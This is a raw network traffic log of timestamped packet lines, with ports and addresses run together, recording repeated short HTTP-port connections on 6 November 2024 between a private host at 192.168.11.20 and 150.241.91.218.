                                                                                                                                                              Nov 6, 2024 17:39:33.142101049 CET8050239150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:33.142115116 CET8050240150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:33.142493963 CET5024080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:33.142493963 CET5023980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:33.142493963 CET5024080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:33.142493963 CET5024080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:33.330399036 CET8050240150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:33.330439091 CET8050240150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.403610945 CET8050240150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.415649891 CET5024080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.416052103 CET5024180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.603593111 CET8050240150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.603775024 CET5024080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.604336977 CET8050241150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.604552984 CET5024180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.604684114 CET5024180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.604685068 CET5024180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.792778015 CET8050241150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.792793036 CET8050241150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.857033968 CET8050241150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:34.872641087 CET5024180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:34.873174906 CET5024280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.060765028 CET8050242150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.060806990 CET8050241150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.060956001 CET5024180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.061065912 CET5024280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.061187029 CET5024280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.061187029 CET5024280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.248873949 CET8050242150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.248883963 CET8050242150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.315582991 CET8050242150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.330219984 CET5024280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.331806898 CET5024380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.518105030 CET8050242150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.518316984 CET5024280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.519889116 CET8050243150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.520157099 CET5024380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.520303011 CET5024380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.520303011 CET5024380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.708511114 CET8050243150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.708553076 CET8050243150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.778305054 CET8050243150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.790019989 CET5024380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.790633917 CET5024480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.978486061 CET8050243150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.978615999 CET5024380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.979232073 CET8050244150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:35.979439020 CET5024480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.979635000 CET5024480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:35.979635954 CET5024480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.167840958 CET8050244150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.167846918 CET8050244150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.236466885 CET8050244150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.249140978 CET5024480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.249866962 CET5024580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.437258959 CET8050245150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.437536955 CET5024580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.437618971 CET8050244150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.437695980 CET5024580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.437695980 CET5024580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.437742949 CET5024480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.625355959 CET8050245150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.625402927 CET8050245150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.697130919 CET8050245150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.707748890 CET5024580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.708185911 CET5024680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.895970106 CET8050245150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.896121979 CET5024580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.896177053 CET8050246150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:36.896384954 CET5024680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.896531105 CET5024680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:36.896531105 CET5024680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.085598946 CET8050246150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.085639000 CET8050246150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.156022072 CET8050246150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.168001890 CET5024680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.168536901 CET5024780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.357042074 CET8050246150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.357245922 CET5024680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.357423067 CET8050247150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.357621908 CET5024780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.357758045 CET5024780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.357758045 CET5024780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.545640945 CET8050247150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.545650005 CET8050247150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.614047050 CET8050247150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.631401062 CET5024780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.631817102 CET5024880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.819525957 CET8050247150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.819593906 CET8050248150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:37.819736004 CET5024780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.819798946 CET5024880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.819943905 CET5024880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:37.819943905 CET5024880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.008739948 CET8050248150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.008776903 CET8050248150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.077788115 CET8050248150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.088540077 CET5024880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.088980913 CET5024980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.276937962 CET8050248150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.276968956 CET8050249150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.277136087 CET5024980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.277136087 CET5024880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.277270079 CET5024980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.277270079 CET5024980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.465785980 CET8050249150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.465828896 CET8050249150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.531802893 CET8050249150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.543035030 CET5024980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.543473959 CET5025080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.730921984 CET8050249150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.731210947 CET5024980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.731235981 CET8050250150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.731584072 CET5025080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.731662989 CET5025080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.731662989 CET5025080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.919781923 CET8050250150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.919825077 CET8050250150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.988671064 CET8050250150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:38.999006033 CET5025080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:38.999490976 CET5025180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.187238932 CET8050250150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.187341928 CET5025080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.187851906 CET8050251150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.188086987 CET5025180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.188199997 CET5025180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.188256979 CET5025180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.376739979 CET8050251150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.376780033 CET8050251150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.722006083 CET8050251150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.735060930 CET5025180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.735812902 CET5025280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.926189899 CET8050251150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.926237106 CET8050252150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:39.926410913 CET5025180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.926476002 CET5025280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.926707029 CET5025280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:39.926707029 CET5025280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:40.115111113 CET8050252150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:40.115156889 CET8050252150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.181837082 CET8050252150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.194453001 CET5025280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.194866896 CET5025380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.383057117 CET8050252150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.383100986 CET8050253150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.383196115 CET5025280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.383270979 CET5025380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.383367062 CET5025380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.383367062 CET5025380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.571477890 CET8050253150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.571727991 CET8050253150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.642786026 CET8050253150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.659636974 CET5025380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.660010099 CET5025480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.848050117 CET8050253150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.848457098 CET5025380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.848845005 CET8050254150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:41.849047899 CET5025480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.849169016 CET5025480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:41.849169016 CET5025480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.037432909 CET8050254150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.037475109 CET8050254150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.107038975 CET8050254150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.118752956 CET5025480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.119322062 CET5025580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.309392929 CET8050254150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.309437990 CET8050255150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.309647083 CET5025480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.309648037 CET5025580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.309837103 CET5025580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.309837103 CET5025580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.497888088 CET8050255150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.497931004 CET8050255150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.568486929 CET8050255150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.583156109 CET5025580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.583894968 CET5025680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.778358936 CET8050255150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.778403044 CET8050256150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.778650999 CET5025580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.778691053 CET5025680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.778747082 CET5025680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.778747082 CET5025680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:42.967361927 CET8050256150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:42.967408895 CET8050256150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:43.037543058 CET8050256150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:43.048937082 CET5025680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:43.049352884 CET5025780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:43.237107992 CET8050256150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:43.237457037 CET5025680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:43.237652063 CET8050257150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:43.237854004 CET5025780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:43.238015890 CET5025780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:43.238017082 CET5025780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:43.426233053 CET8050257150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:43.426275969 CET8050257150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:44.515031099 CET8050257150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:44.525903940 CET5025780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:44.526345015 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:44.714021921 CET8050257150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:44.714150906 CET5025780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:44.714230061 CET8050258150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:44.714413881 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:44.714620113 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:44.714620113 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:44.918625116 CET8050258150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:44.918636084 CET8050258150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:45.988746881 CET8050258150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.068974018 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.159113884 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.159589052 CET5025980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.347423077 CET8050258150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.347456932 CET8050259150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.347639084 CET5025980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.347639084 CET5025880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.347770929 CET5025980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.347771883 CET5025980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.536362886 CET8050259150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.536408901 CET8050259150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.605601072 CET8050259150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.618212938 CET5025980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.618686914 CET5026080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.810177088 CET8050259150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.810220957 CET8050260150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.810441971 CET5025980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.810472012 CET5026080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.810592890 CET5026080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.810592890 CET5026080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:46.998728991 CET8050260150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:46.998773098 CET8050260150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.070251942 CET8050260150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.082526922 CET5026080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.082967043 CET5026180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.283255100 CET8050260150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.283298969 CET8050261150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.283488035 CET5026180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.283488989 CET5026080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.283655882 CET5026180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.283655882 CET5026180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.476284027 CET8050261150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.476298094 CET8050261150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.541244984 CET8050261150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.552422047 CET5026180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.552823067 CET5026280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.743457079 CET8050261150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.743828058 CET5026180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.744498968 CET8050262150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.744739056 CET5026280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.744862080 CET5026280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.744862080 CET5026280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:47.938227892 CET8050262150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:47.938267946 CET8050262150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.025417089 CET8050262150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.039113998 CET5026280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.039591074 CET5026380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.227380991 CET8050262150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.227492094 CET8050263150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.227585077 CET5026280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.227710962 CET5026380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.227840900 CET5026380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.227891922 CET5026380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.416100979 CET8050263150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.416142941 CET8050263150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.487947941 CET8050263150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.501698017 CET5026380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.502254009 CET5026480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.690236092 CET8050264150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.690252066 CET8050263150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.690512896 CET5026480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.690532923 CET5026380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.690732002 CET5026480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.690732002 CET5026480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.878839970 CET8050264150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.878876925 CET8050264150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.945841074 CET8050264150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:49.956693888 CET5026480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:49.957267046 CET5026580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.145596981 CET8050265150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.145628929 CET8050264150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.145808935 CET5026580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.145808935 CET5026480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.145997047 CET5026580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.146167994 CET5026580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.333797932 CET8050265150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.333837986 CET8050265150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.430726051 CET8050265150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.446399927 CET5026580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.447083950 CET5026680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.639050007 CET8050266150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.639069080 CET8050265150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.639390945 CET5026580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.639446020 CET5026680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.639601946 CET5026680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.639601946 CET5026680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.844439030 CET8050266150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.844446898 CET8050266150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.896370888 CET8050266150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:50.916598082 CET5026680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:50.917109013 CET5026780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:39:51.108175993 CET8050266150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:39:51.108232021 CET8050267150.241.91.218192.168.11.20
